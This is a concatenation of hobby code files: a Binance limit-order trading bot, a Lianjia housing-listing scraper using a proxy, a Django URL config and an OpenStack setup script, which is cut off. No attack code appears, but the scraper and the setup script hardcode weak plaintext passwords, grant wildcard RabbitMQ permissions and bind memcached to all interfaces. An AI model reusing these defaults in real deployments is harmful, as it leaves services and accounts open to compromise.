False\n\n\n    # fetch 1-minute candlesticks\n    candles = client.get_klines(symbol=order_symbol, interval=Client.KLINE_INTERVAL_1MINUTE)\n\n    Open_times = [x[0] for x in candles] # use the first 10 digits when calling datetime.fromtimestamp\n    Opens = [x[1] for x in candles]\n    Highs = [x[2] for x in candles]\n    Lows = [x[3] for x in candles]\n    Closes = [x[4] for x in candles]\n    Volumes = [x[5] for x in candles]\n    Close_times = [x[6] for x in candles]\n\n    # fetch trading fees\n    fees = client.get_trade_fee(symbol=order_symbol)\n    makercommission = fees[0]['makerCommission']\n    takercommission = fees[0]['takerCommission']\n    print(f'Trading fee maker commission : {makercommission}')\n    print(f'Trading fee taker commission : {takercommission}')\n\n    symbol_info = client.get_symbol_info(order_symbol)\n    minprice = symbol_info['filters'][0]['minPrice'] \n    maxprice = symbol_info['filters'][0]['maxPrice'] \n    ticksize = symbol_info['filters'][0]['tickSize'] \n    minQty = symbol_info['filters'][2]['minQty'] \n    maxQty = symbol_info['filters'][2]['maxQty'] \n    stepSize = symbol_info['filters'][2]['stepSize'] \n    multiplierUp = symbol_info['filters'][1]['multiplierUp'] \n    multiplierDown = symbol_info['filters'][1]['multiplierDown'] \n    baseAssetPrecision = symbol_info['baseAssetPrecision']\n    quoteAssetPrecision = symbol_info['quoteAssetPrecision']\n\n    # 5-minute average price\n    avg5min = np.average([float(x) for x in Closes[-5:]])\n\n    # 5-minute average price x multiplierUp\n    maxprice_percentfilter = float(avg5min) * float(multiplierUp)\n\n    # 5-minute average price x multiplierDown\n    minprice_percentfilter = float(avg5min) * float(multiplierDown)\n\n    # get the 10-minute low\n    min_10min = np.min([float(x) for x in Lows[-10:]])\n    print(f'10-minute low: {min_10min}')\n\n    # get the 10-minute high\n    max_10min = np.max([float(x) for x in Highs[-10:]])\n    print(f'10-minute high: {max_10min}')\n\n    min_notional = symbol_info['filters'][3]['minNotional']\n\n\n    # update the buy-side prices to the 10-minute low\n    order_price = min_10min\n    order_stopprice = min_10min\n\n    # update the sell-side prices to the 10-minute high\n    revorder_price = max_10min\n    revorder_stopprice = max_10min\n\n\n    # BUY side\n    # take half of the quote currency currently held\n    half_quote_asset = float(client.get_asset_balance(asset=symbol_info['quoteAsset'])['free']) / 2\n\n    # compute the order quantity corresponding to half of the currency\n    half_quantity = decimal.Decimal(str(half_quote_asset)) // decimal.Decimal(str(stepSize)) * decimal.Decimal(str(stepSize))\n\n    
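A comment above notes that kline open times need their "first 10 digits" for `datetime.fromtimestamp`; the usual equivalent is dividing the millisecond epoch by 1000 instead of slicing digits (the timestamp value below is illustrative):

```python
from datetime import datetime

# Binance kline timestamps are millisecond epochs; dividing by 1000
# converts them to seconds without any string manipulation.
open_dt = datetime.fromtimestamp(1614556800000 / 1000)
```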
# format as a string with Precision decimal places\n    order_quantity = '{:.{}f}'.format(half_quantity, quoteAssetPrecision)\n\n    # SELL side\n    # take half of the base currency currently held\n    half_base_asset = float(client.get_asset_balance(asset=symbol_info['baseAsset'])['free']) / 2\n    # compute the order quantity corresponding to half of the currency\n    revhalf_quantity = decimal.Decimal(str(half_base_asset)) // decimal.Decimal(str(stepSize)) * decimal.Decimal(str(stepSize))\n    # format as a string with Precision decimal places\n    revorder_quantity = '{:.{}f}'.format(revhalf_quantity, baseAssetPrecision)\n\n\n    exitflg = False\n    revexitflg = False\n\n    # BUY-side checks\n\n    # price filter check\n    if float(maxprice) < float(order_price):\n        print(f'Price exceeds the maximum; it must be at most {maxprice}')\n        exitflg = True\n    elif float(order_price) < float(minprice):\n        print(f'Price is below the minimum; it must be at least {minprice}')\n        exitflg = True\n\n    # quantity filter check\n    if float(maxQty) < float(order_quantity):\n        print(f'Quantity exceeds the maximum; it must be at most {maxQty}')\n        exitflg = True\n    elif float(minQty) > float(order_quantity):\n        print(f'Quantity is below the minimum; it must be at least {minQty}')\n        exitflg = True\n\n    # PERCENT_PRICE check\n    if float(maxprice_percentfilter) < float(order_price):\n        print(f'Price exceeds the maximum; it must be at most {maxprice_percentfilter}')\n        exitflg = True\n    elif float(order_price) < float(minprice_percentfilter):\n        print(f'Price is below the minimum; it must be at least {minprice_percentfilter}')\n        exitflg = True\n\n    # MIN_NOTIONAL check\n    if float(min_notional) >= float(order_price) * float(order_quantity):\n        print(f\"price x quantity is below MIN_NOTIONAL.\\nIt must be at least {min_notional}\")\n        exitflg = True\n\n    # SELL-side checks\n    # price filter check\n    if float(maxprice) < float(revorder_price):\n        print(f'Price exceeds the maximum; it must be at most {maxprice}')\n        revexitflg = True\n    elif float(revorder_price) < float(minprice):\n        print(f'Price is below the minimum; it must be at least {minprice}')\n        revexitflg = True\n\n    # quantity filter check\n    if float(maxQty) < float(revorder_quantity):\n        print(f'Quantity exceeds the maximum; it must be at most {maxQty}')\n        revexitflg = True\n    elif float(minQty) > float(revorder_quantity):\n        print(f'Quantity is below the minimum; it must be at least {minQty}')\n        revexitflg = True\n\n    # PERCENT_PRICE check\n    if float(maxprice_percentfilter) < float(revorder_price):\n        print(f'Price exceeds the maximum; it must be at most {maxprice_percentfilter}')\n        revexitflg = True\n    elif float(revorder_price) < float(minprice_percentfilter):\n        print(f'Price is below the minimum; it must be at least {minprice_percentfilter}')\n        revexitflg = True\n\n    # MIN_NOTIONAL check\n    if float(min_notional) >= float(revorder_price) * float(revorder_quantity):\n        print(f\"price x quantity is below MIN_NOTIONAL.\\nIt must be at least {min_notional}\")\n        revexitflg = True\n\n\n    if exitflg:\n        print('Skipping the BUY order')\n\n    else:\n        print('BUY order judged executable')\n\n        try:\n            order = client.create_test_order(\n                symbol=order_symbol,\n                side=order_side,\n                type=order_type,\n                timeInForce=order_timeInForce,\n                quantity=order_quantity,\n                price=order_price,\n                stopPrice=order_stopprice)\n            \n        except BinanceAPIException as e:\n            print(e)\n            if e.code == -1021:\n                print(\"The server time may need updating\")\n            elif e.code == -1013:\n                print(\"price x quantity is below MIN_NOTIONAL.\\nThe per-trade amount must be increased\")\n\n            return False\n\n        else:\n            print(\"Test Order Success\")\n            print(\"Placing the order with the following parameters\")\n            print(f\"symbol : {order_symbol}\")\n            print(f\"side : {order_side}\")\n            print(f\"type : {order_type}\")\n            print(f\"timeInForce : {order_timeInForce}\")\n            print(f\"quantity : {order_quantity}\")\n            print(f\"price : {order_price}\")\n            print(f\"stopPrice : {order_stopprice}\")\n\n            try:\n                \n                order = client.create_order(\n                    symbol=order_symbol,\n                    side=order_side,\n                    type=order_type,\n                    timeInForce=order_timeInForce,\n                    quantity=order_quantity,\n                    price=order_price,\n                    stopPrice=order_stopprice)\n                \n            except BinanceAPIException as e:\n                print(e)\n            else:\n                print('Buy order complete')\n                print(client.get_open_orders(symbol=order_symbol))\n                info()\n\n    
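The buy- and sell-side blocks above duplicate the same four filter checks; a single validator could serve both sides. A sketch under the assumption that the exchange filters are passed in as plain floats (the function and parameter names are illustrative, not from the script):

```python
def violates_filters(price, qty, min_price, max_price,
                     min_qty, max_qty, min_notional):
    # Returns True if any exchange filter would reject the order.
    if not (min_price <= price <= max_price):
        return True
    if not (min_qty <= qty <= max_qty):
        return True
    return price * qty <= min_notional
```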
if revexitflg:\n        print('Skipping the SELL order')\n    else:\n        print('SELL order judged executable')\n\n        try:\n            order = client.create_test_order(\n                symbol=order_symbol,\n                side=revorder_side,\n                type=revorder_type,\n                timeInForce=revorder_timeInForce,\n                quantity=revorder_quantity,\n                price=revorder_price,\n                stopPrice=revorder_stopprice)\n            \n        except BinanceAPIException as e:\n            print(e)\n            if e.code == -1021:\n                print(\"The server time may need updating\")\n            elif e.code == -1013:\n                print(\"price x quantity is below MIN_NOTIONAL.\\nThe per-trade amount must be increased\")\n\n\n\n        else:\n            print(\"Test Order Success\")\n            print(\"Placing the order with the following parameters\")\n            print(f\"symbol : {order_symbol}\")\n            print(f\"side : {revorder_side}\")\n            print(f\"type : {revorder_type}\")\n            print(f\"timeInForce : {revorder_timeInForce}\")\n            print(f\"quantity : {revorder_quantity}\")\n            print(f\"price : {revorder_price}\")\n            print(f\"stopPrice : {revorder_stopprice}\")\n\n\n            try:\n                \n                order = client.create_order(\n                    symbol=order_symbol,\n                    side=revorder_side,\n                    type=revorder_type,\n                    timeInForce=revorder_timeInForce,\n                    quantity=revorder_quantity,\n                    price=revorder_price,\n                    stopPrice=revorder_stopprice)\n                \n            except BinanceAPIException as e:\n                print(e)\n            else:\n                print('Sell order complete')\n                print(client.get_open_orders(symbol=order_symbol))\n                info()\n\n# function that runs continuously on a separate thread\ndef background():\n    while True:\n        schedule.run_pending() # run any pending scheduled jobs\n        sleep(1)\n\n\n# threading1 runs the background function and keeps working independently of user input\nthreading1 = threading.Thread(target=background)\nthreading1.daemon = True\nthreading1.start()\n\n\ndef task10minutes(): # defined as the function to run once every 10 minutes\n    info()\n\n\nschedule.every(10).minutes.do(task10minutes) # run task10minutes every 10 minutes\n\n# startup help text \nhelp = 'This is a learning program that accesses Binance to fetch information and place limit orders\\n \\\nThe following commands are accepted\\n \\\nhelp : show this help\\n \\\nquit : exit the program\\n \\\ninfo : print account information (also printed automatically every 10 minutes)\\n \\\norder: place an order\\n'\n\n\n\ndef main():\n    print(help) # show the help and prompt the user for a command\n    while True:\n        c = sys.stdin.readline() # read the user's command input line by line\n\n        # print(f'read characters: {str(c)}') # debug: print the characters read\n\n        # check whether the line contains a command and, if so, run the matching function\n        if 'quit' in c:\n            sys.exit()\n        elif 'help' in c:\n            print(help)\n        elif 'info' in c:\n            info()\n        elif 'order' in c:\n            order()\n\nif __name__ == '__main__':\n    main()\n\n\n# Constraints\n# API endpoints are rate limited by Binance to 20 requests per second\n# 1200 requests/minute\n# 10 orders per second\n# 100,000 orders per 24 hours\n\n# ML constraints\n\n\n# https://sammchardy.github.io/binance-order-filters/","repo_name":"tyamzak/binance_trade","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14911,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
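The constraints listed at the end of the script above (20 requests/second, 1200/minute) suggest throttling REST calls on the client side; a minimal single-threaded limiter, not part of python-binance (sketch; names are illustrative):

```python
import time

_last_call = 0.0

def throttled(func, *args, min_interval=0.05, **kwargs):
    # Sleep just enough to keep at most 1/min_interval calls per second.
    global _last_call
    wait = min_interval - (time.time() - _last_call)
    if wait > 0:
        time.sleep(wait)
    _last_call = time.time()
    return func(*args, **kwargs)
```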
+{"seq_id":"11395260962","text":"import requests\nimport pymysql\nimport warnings\nimport re\n\nclass HomeSpyder:\n    def __init__(self):\n        self.headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36\"}\n        self.baseurl = \"https://bj.lianjia.com/ershoufang/pg\"\n        self.proxies = {\"http\":\"http://216.198.188.26:51068\"} # proxy has expired\n        self.page = 1\n        self.db = pymysql.connect(host=\"localhost\", user=\"root\",\n                 password=\"a123456\", charset=\"utf8\")\n        self.cursor = self.db.cursor()\n\n    def readPage(self,url):\n        res = requests.get(url,proxies=self.proxies,headers=self.headers,timeout=5)\n        res.encoding = \"utf-8\"\n        html = res.text\n        print(\"Page fetched successfully, parsing...\")\n        self.parePage(html)\n\n    def parePage(self,html):\n        pattern = '<div class=\"positionInfo\".*?\"region\">(.*?)</a>.*?\"_blank\">(.*?)</a>.*?totalPrice.*?<span>(.*?)</span>'\n        p = re.compile(pattern,re.S)\n        r_list = p.findall(html)\n        print(\"Page parsed, writing to the database...\")\n        self.writePage(r_list)\n    \n    def writePage(self,r_list):\n        c_db = \"create database if not exists Lianjiadb \\\n                character set utf8\"\n        u_db = \"use Lianjiadb\"\n        c_tab = \"create table if not exists Price(\\\n                 id int primary key auto_increment,\\\n                 houseName varchar(50),\\\n                 totalPrice int)charset=utf8\"\n\n        warnings.filterwarnings(\"ignore\")\n        try:\n            self.cursor.execute(c_db)\n            self.cursor.execute(u_db)\n            self.cursor.execute(c_tab)\n        except Warning:\n            pass\n\n        ins = \"insert into Price(houseName, totalPrice) values(%s,%s)\"\n        for r_tuple in r_list:\n            houseName = r_tuple[0].strip()+\"-\"+r_tuple[1].strip()\n            totalPrice = float(r_tuple[2].strip())*10000\n            L = [houseName,totalPrice]\n            self.cursor.execute(ins,L)\n            self.db.commit() \n        print(\"Write successful\")\n    \n    def workOn(self):\n        while True:\n            c = input(\"Crawl this page? (y/n): \")\n            if c.strip().lower() == \"y\":\n                url = self.baseurl + str(self.page) +\"/\"\n                self.readPage(url)\n                self.page += 1\n            else:\n                print(\"Crawling finished\")\n                self.cursor.close()\n                self.db.close()\n                break\n    \nif __name__ == \"__main__\":\n    spyder = HomeSpyder()\n    spyder.workOn()\n\n\n\n\n\n","repo_name":"dian0624/Crawler","sub_path":"home_ToMysql.py","file_name":"home_ToMysql.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14228627269","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom rest_framework import routers\nfrom personal.views import PersonalViewSet\nfrom personal import views\nrouter = routers.DefaultRouter()\n\nrouter.register(r'personal', PersonalViewSet)\n#router.register(r'datos-academicos', DatosAcademicosViewSet)\nurlpatterns = [\n    # Examples:\n    url(r'^$', 'personal.views.home', name='home'),\n    # url(r'^blog/', include('blog.urls')),\n    url(r'^api/', include(router.urls)),\n    url(r'^api/datos-academicos/$', views.DatosAcademicosCreate.as_view()),\n    url(r'^api/datos-academicos/(?P<pk>[0-9]+)/$', views.DatosAcademicosDetail.as_view()),\n    url(r'^api/familiar/$', views.FamiliarCreate.as_view()),\n    url(r'^api/familiar-list/(?P<pk>[0-9]+)/$', views.FamiliarList.as_view()),\n    url(r'^api/familiar-detail/(?P<pk>[0-9]+)/$', views.FamiliarDetail.as_view()),\n    url(r'^api/cuotas/$', views.CuotasCreate.as_view()),\n    url(r'^api/cuotas/(?P<pk>[0-9]+)/$', views.CuotasDetail.as_view()),\n    url(r'^api/cargo/$', views.CargoCreate.as_view()),\n    url(r'^api/cargo-list/(?P<pk>[0-9]+)/$', views.CargoList.as_view()),\n    url(r'^api/cargo-detail/(?P<pk>[0-9]+)/$', views.CargoDetail.as_view()),\n    url(r'^api/deporte/$', views.DeporteCreate.as_view()),\n    url(r'^api/deporte-list/(?P<pk>[0-9]+)/$', views.DeporteList.as_view()),\n    url(r'^api/deporte-detail/(?P<pk>[0-9]+)/$', views.DeporteDetail.as_view()),\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n\n    url(r'^api/noticias/(?P<username>\\w+)/$', views.profile_page,),\n]\n","repo_name":"HenryGBC/Apunet","sub_path":"apunet/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
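The Lianjia spider above extracts listings with a single regex, which is tightly coupled to the page markup; a parser-based variant (assuming BeautifulSoup is available — the selector below is a guess inferred from the regex) tends to survive layout changes better:

```python
from bs4 import BeautifulSoup

def parse_listings(html):
    soup = BeautifulSoup(html, "html.parser")
    # Guessing the structure from the regex: region/name anchors per listing.
    for block in soup.select("div.positionInfo"):
        links = block.select("a")
        if len(links) >= 2:
            yield links[0].get_text(strip=True), links[1].get_text(strip=True)
```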
+{"seq_id":"70552597928","text":"#!/usr/bin/env python\n\nimport os\nimport subprocess\nimport socket\nimport getpass\nimport re\nfrom typing import Tuple\nfrom termcolor import colored\n# name=\"/Users/hungnt\"\n# if os.path.isdir(name):\n#     print( name +\"is a directory\")\n#     subprocess.call([\"ls\",\"-l\",name])\n# else:\n#     print(name + \"is not a directory\")\n\nsubnet_interface=\"0.0.0.0/24\"\nrootpasswd=\"th61\"\nhostname_controller=\"controller\"\nhostname_compute=\"compute\"\nServerName_controller=\"ServerName %s\"%hostname_controller\nmemcache_servers = 'memcache_servers = %s:11211'%hostname_controller\n\ndef checkAllVariable_func():\n    print(\"\\n\")\n    print(colored(\"Check all variables\",\"red\"))\n    print(\"Subnet interface: \" + subnet_interface)\n    print(\"root password: \" + rootpasswd)\n    print(\"Host name controller: \" + hostname_controller)\n    print(\"Host name compute: \" + hostname_compute)\n    print(\"Server name controller: \" + ServerName_controller )\n    print(\"Memcache servers: \" +memcache_servers)\n    print(\"\\n\")\n\ndef checkOSInfo_func():\n    print(\"\\n\")\n    print(colored('Gathering system information\\n',\"red\"))\n    uname =\"uname\"\n    uname_arg = '-a'\n    print(\"Gathering system information with %s command:\\n\" % uname)\n    subprocess.call([uname, uname_arg])\n    print(\"\\n\")\n\ndef checkDiskInfo_func():\n    print(\"\\n\")\n    print(colored('Gathering disk information\\n',\"red\"))\n    DISKSPACE=\"df\"\n    DISKSPACE_ARG=\"-h\"\n    print(\"Gathering diskspace information with the %s command: \\n\\n\" % DISKSPACE)\n    subprocess.call([DISKSPACE,DISKSPACE_ARG])\n    print(\"\\n\")\n\ndef listFile_func():\n    print(\"\\n\")\n    print(colored('List all files in the source folder',\"red\"))\n    subprocess.call(\"ls -al\",shell=True )\n    print(\"\\n\")\n\ndef checkUser_func():\n    # whoami=\"whoami\"\n    # user_temp=subprocess.call([whoami])\n    # str_user=user_temp\n    # user=str(str_user)\n    # import socket\n    # hostname = socket.gethostname()\n    # print(hostname)\n    # print(user_temp)\n    user=getpass.getuser()\n    print(colored('Process is running as user: '+ user,\"red\"))\n    if(user=='root'):\n        print(colored(\"Running as the root user\",\"red\"))\n    else:\n        print(colored(\"Must be run as the root user\\nEXIT NOW\",\"red\"))\n        exit()\n\ndef mariadbCheck_func():\n    command=\"dpkg -l | awk '/mariadb/ {print }'|wc -l\"\n    mariadb_status=subprocess.call(command, shell=True)\n    # if(mariadb_status==0):\n    print(\"Mariadb not ready, installing it now\")\n    # subprocess.call(\"dnf module -y install mariadb:10.3\", shell=True)\n    subprocess.call(\"chmod +x mariadb_install.sh\", shell=True)\n    subprocess.call(\"./mariadb_install.sh\", shell=True)\n    # if(mariadb_status==1):\n    #     print(\"Mariadb is ready\")\n\ndef ntpServerCheck_func():\n    command=\"dnf -y install chrony\"\n    subprocess.call(command,shell=True)\n    subprocess.call(\"echo allow %s >> /etc/chrony.conf\" %subnet_interface, shell=True)\n    subprocess.call(\"systemctl enable --now chronyd && firewall-cmd --add-service=ntp --permanent && firewall-cmd --reload\", shell=True)\n\ndef addOpentackRepo_func():\n    command=\"\"\"dnf -y install centos-release-openstack-victoria && sed -i -e \"s/enabled=1/enabled=0/g\" /etc/yum.repos.d/CentOS-OpenStack-victoria.repo && dnf --enablerepo=centos-openstack-victoria -y upgrade\"\"\"\n    # subprocess.call(command, shell=True)\n    flag=subprocess.call(command, shell=True)\n    if(flag !=0):\n        print(\"Cannot add OP repo, exit now\")\n        exit()\n\n\ndef replace_line(file_name, line_num, text):\n    # lines = open(file_name, 'r').readlines()\n    # lines[line_num] = text\n    # out = open(file_name, 'w')\n    # 
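op.py above checks some `subprocess.call` return codes by hand and silently ignores others; a thin wrapper around `subprocess.run(check=True)` would make failures loud everywhere (a sketch, not part of the original script):

```python
import subprocess

def sh(command: str) -> None:
    # Raises subprocess.CalledProcessError when the command exits non-zero,
    # so a failed setup step cannot be silently skipped.
    subprocess.run(command, shell=True, check=True)
```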
out.writelines(lines)\n # out.close()\n with open(file_name,'r') as f:\n get_all=f.readlines()\n print(get_all)\n with open(file_name,'w') as f:\n for i,line in enumerate(get_all,1): ## STARTS THE NUMBERING FROM 1 (by default it begins with 0) \n if i == line_num: ## OVERWRITES line:line_num\n f.writelines(\"%s\\n\" %text)\n else:\n f.writelines(line)\n \ndef add_line(filename, find, insert):\n with open(filename) as in_file:\n old_contents = in_file.readlines()\n\n with open(filename, 'w') as in_file:\n for line in old_contents:\n in_file.write(line)\n if re.match(r\"%s\"%find, line):\n in_file.write('%s\\n'%insert)\n\n # def find_append_to_file():\n # \"\"\"Find and append text in a file.\"\"\"\n # with open(filename, 'r+') as file:\n # lines = file.read()\n\n # index = repr(lines).find(find) - 1\n # if index < 0:\n # raise ValueError(\"The text was not found in the file!\")\n\n # len_found = len(find) - 1\n # old_lines = lines[index + len_found:]\n\n # file.seek(index)\n # file.write(insert)\n # file.write(old_lines)\n\ndef findAndReplace_func(file_name, old, new):\n # Read in the file\n with open(file_name, 'r') as file :\n filedata = file.read()\n# Replace the target string\n filedata = filedata.replace(old, new)\n# Write the file out again\n with open(file_name, 'w') as file:\n file.write(filedata)\n\ndef getRequirements_func():\n mariadbCheck_func()\n ntpServerCheck_func()\n addOpentackRepo_func()\n subprocess.call(\"yum install epel-release -y\", shell=True)\n print(\"Install RabbitMQ, Memcached.\")\n print(\"enable powertools\")\n flag=subprocess.call(\"dnf --enablerepo=powertools -y install rabbitmq-server memcached\", shell=True)\n if(flag != 0 ):\n print(\"Install Install RabbitMQ, Memcached fail\")\n exit()\n print(\"edit mariadb conf\")\n # replace_line(\"/etc/my.cnf.d/mariadb-server.cnf\", 151,\"max_connections=500\")\n add_line(\"/etc/my.cnf.d/mariadb-server.cnf\", \"[mysqld]\",\"max_connections=500\")\n replace_line(\"/etc/sysconfig/memcached\", 5, \"\"\"OPTIONS=\"-l 0.0.0.0,::\" \"\"\")\n subprocess.call(\"systemctl restart mariadb rabbitmq-server memcached\", shell=True)\n subprocess.call(\"systemctl enable mariadb rabbitmq-server memcached\", shell=True)\n print(\"add openstack user\")\n subprocess.call(\"rabbitmqctl add_user openstack password\",shell=True)\n subprocess.call(\"\"\"rabbitmqctl set_permissions openstack \".*\" \".*\" \".*\" \"\"\",shell=True)\n print(\"If SELinux is enabled, change policy.\")\n subprocess.call(\"checkmodule -m -M -o rabbitmqctl.mod rabbitmqctl.te && semodule_package --outfile rabbitmqctl.pp --module rabbitmqctl.mod && semodule -i rabbitmqctl.pp\",shell=True)\n print(\"If Firewalld is running, allow ports for services.\")\n subprocess.call(\"firewall-cmd --add-service={mysql,memcache} --permanent && firewall-cmd --add-port=5672/tcp --permanent && firewall-cmd --reload\", shell=True)\n\n \ndef prepareDB_func():\n print(\"Prepare database....\")\n string=\"rootpasswd='%s' \"%rootpasswd\n print(string)\n replace_line(\"db_init.sh\", 4,string)\n subprocess.call(\"./db_init.sh\", shell=True)\n\ndef activeKeyston_func():\n string=\"export OS_AUTH_URL=http://%s:5000/v3\"%hostname_controller\n replace_line(\"keystonerc\",6,string)\n print(\"step1\")\n subprocess.call(\"chmod +x activeKeystone.sh\",shell=True)\n subprocess.call(\"./activeKeystone.sh\",shell=True)\n # subprocess.call(\". 
activeKeystone.sh\",shell=True)\n print(\"step2\")\n \n # subprocess.call(\"chmod 600 ~/keystonerc\", shell=True)\n # print(\"step3\")\n \n # subprocess.call(\"source ~/keystonerc && echo 'source ~/keystonerc ' >> ~/.bash_profile\", shell=True)\n # print(\"step4\")\n \n\ndef setupKeystone_func():\n print(\"Install Keystone\")\n flag=subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,epel,powertools -y install openstack-keystone python3-openstackclient httpd mod_ssl python3-mod_wsgi python3-oauth2client\", shell=True)\n if(flag!=0):\n print(\"Install fail\")\n exit()\n replace_line(\"/etc/keystone/keystone.conf\",440,memcache_servers)\n connection=\"connection = mysql+pymysql://keystone:password@%s/keystone \"%hostname_controller\n replace_line(\"/etc/keystone/keystone.conf\",615,connection)\n string1=\"provider = fernet\"\n replace_line(\"/etc/keystone/keystone.conf\",2499,string1)\n subprocess.call(\"su -s /bin/bash keystone -c 'keystone-manage db_sync'\",shell=True)\n print('initialize keys')\n subprocess.call(\"keystone-manage fernet_setup --keystone-user keystone --keystone-group keystone\",shell=True)\n subprocess.call(\"keystone-manage credential_setup --keystone-user keystone --keystone-group keystone\",shell=True)\n command=\"keystone-manage bootstrap --bootstrap-password adminpassword --bootstrap-admin-url http://%s:5000/v3/ --bootstrap-internal-url http://%s:5000/v3/ --bootstrap-public-url http://%s:5000/v3/ --bootstrap-region-id RegionOne \"%(hostname_controller,hostname_controller,hostname_controller)\n subprocess.call(command,shell=True)\n print(\"If SELinux is enabled, change boolean settings.\")\n subprocess.call(\"setsebool -P httpd_use_openstack on && setsebool -P httpd_can_network_connect on && setsebool -P httpd_can_network_connect_db on\", shell=True)\n subprocess.call(\"checkmodule -m -M -o keystone-httpd.mod keystone-httpd.te && semodule_package --outfile keystone-httpd.pp --module keystone-httpd.mod && semodule -i keystone-httpd.pp\",shell=True)\n print(\"If Firewalld is running, allow ports for services.\")\n subprocess.call(\"firewall-cmd --add-port=5000/tcp --permanent && firewall-cmd --reload\", shell=True)\n print(\"Enable settings for Keystone and start Apache httpd.\")\n replace_line(\"/etc/httpd/conf/httpd.conf\",98,ServerName_controller)\n subprocess.call(\"ln -s /usr/share/keystone/wsgi-keystone.conf /etc/httpd/conf.d/\", shell=True)\n subprocess.call(\"systemctl enable --now httpd\", shell=True)\n # string2=\"export OS_AUTH_URL=http://%s/v3\"%hostname_controller\n # replace_line(\"keystonerc\",6,string2)\n # subprocess.call(\"cp keystonerc > /root/keystonerc\",shell=True)\n # subprocess.call(\"chmod 600 /root/keystonerc\", shell=True)\n # print(\"test\")\n # subprocess.call(\"source ~/keystonerc && echo 'source ~/keystonerc '' >> ~/.bash_profile\", shell=True)\n activeKeyston_func()\n print(\"Create OP Projects.\")\n subprocess.call(\"openstack project create --domain default --description 'Service Project' service\",shell=True)\n \ndef configureGlance_func():\n # activeKeyston_func()\n subprocess.call(\"\"\"openstack project create --domain default --description \"Service Project\" service\"\"\", shell=True)\n subprocess.call(\"openstack project list\", shell=True)\n print(\"Install and Configure OpenStack Image Service (Glance).\")\n print(\"create [glance] user in [service] project\")\n subprocess.call(\"openstack user create --domain default --project service --password servicepassword glance\",shell=True)\n print(\"add [glance] user in 
[admin] role\")\n subprocess.call(\"openstack role add --project service --user glance admin\", shell=True)\n print(\"create service entry for [glance]\")\n subprocess.call(\"openstack service create --name glance --description 'OpenStack Image service' image\",shell=True)\n print(\"create endpoint for [glance] (public)\")\n subprocess.call(\"openstack endpoint create --region RegionOne image public http://%s:9292\"%hostname_controller, shell=True)\n print(\"create endpoint for [glance] (internal)\")\n subprocess.call(\"openstack endpoint create --region RegionOne image internal http://%s:9292\"%hostname_controller,shell=True)\n print(\"create endpoint for [glance] (admin)\")\n subprocess.call(\"openstack endpoint create --region RegionOne image admin http://%s:9292\"%hostname_controller, shell=True)\n print(\"Install Glance.\")\n print(\"install from Victoria, EPEL, powertools\")\n subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,powertools,epel -y install openstack-glance\", shell=True)\n print(\"Configure Glance.\")\n subprocess.call(\"mv /etc/glance/glance-api.conf /etc/glance/glance-api.conf.org\", shell=True)\n findAndReplace_func(\"glance-api.conf\",\"CONTROLER_HOST\",hostname_controller)\n subprocess.call(\"cp glance-api.conf /etc/glance/glance-api.conf\",shell=True)\n subprocess.call(\"chmod 640 /etc/glance/glance-api.conf && chown root:glance /etc/glance/glance-api.conf && su -s /bin/bash glance -c 'glance-manage db_sync'\", shell=True)\n subprocess.call(\"systemctl enable --now openstack-glance-api && echo 'If SELinux is enabled, change boolean settings.' && setsebool -P glance_api_can_network on\",shell=True)\n subprocess.call(\"checkmodule -m -M -o glanceapi.mod glanceapi.te && semodule_package --outfile glanceapi.pp --module glanceapi.mod && semodule -i glanceapi.pp\", shell=True)\n print(\"If Firewalld is running, allow ports for services.\")\n subprocess.call(\"firewall-cmd --add-port=9292/tcp --permanent && firewall-cmd --reload\",shell=True)\n\ndef setupKVM_func():\n print(\"Seting up KVM\")\n subprocess.call(\"dnf -y install qemu-kvm libvirt virt-install\", shell=True)\n print(\"Check module\")\n # if\n subprocess.call(\"lsmod | grep kvm\", shell=True)\n subprocess.call(\" systemctl enable --now libvirtd\", shell=True)\n\ndef configureNova_func():\n # activeKeyston_func()\n print(\"Create [nova] user in [service] project\")\n subprocess.call(\"openstack user create --domain default --project service --password servicepassword nova\", shell=True)\n print(\"Add [nova] user in [admin] role\")\n subprocess.call(\"openstack role add --project service --user nova admin\", shell=True)\n print(\"Create [placement] user in [service] project\")\n subprocess.call(\"openstack user create --domain default --project service --password servicepassword placement\", shell=True)\n print(\"add [placement] user in [admin] role\")\n subprocess.call(\"openstack role add --project service --user placement admin\", shell=True)\n print(\"Create service entry for [nova]\")\n subprocess.call(\"openstack service create --name nova --description 'OpenStack Compute service' compute\",shell=True)\n print(\"Create service entry for [placement]\")\n subprocess.call(\"openstack service create --name placement --description 'OpenStack Compute Placement service' placement\", shell=True)\n # print(\"Define Nova API Host\")\n # subprocess.call(\"\", shell=True)\n print(\"create endpoint for [nova] (public)\")\n subprocess.call(\"openstack endpoint create --region RegionOne compute public 
http://controller:8774/v2.1/%\\(tenant_id\\)s\", shell=True)\n    print(\"create endpoint for [nova] (internal)\")\n    subprocess.call(\"openstack endpoint create --region RegionOne compute internal http://controller:8774/v2.1/%\\(tenant_id\\)s\", shell=True)\n    print(\"create endpoint for [nova] (admin)\")\n    subprocess.call(\"openstack endpoint create --region RegionOne compute admin http://controller:8774/v2.1/%\\(tenant_id\\)s\", shell=True)\n    print(\"create endpoint for [placement] (public)\")\n    subprocess.call(\" openstack endpoint create --region RegionOne placement public http://controller:8778\", shell=True)\n    print(\"create endpoint for [placement] (internal)\")\n    subprocess.call(\"openstack endpoint create --region RegionOne placement internal http://controller:8778\", shell=True)\n    print(\"create endpoint for [placement] (admin)\")\n    subprocess.call(\"openstack endpoint create --region RegionOne placement admin http://controller:8778\", shell=True)\n    print(\"Install Nova services.\")\n    subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,powertools,epel -y install openstack-nova openstack-placement-api\",shell=True)\n    print(\"Configure Nova.\")\n    subprocess.call(\"mv 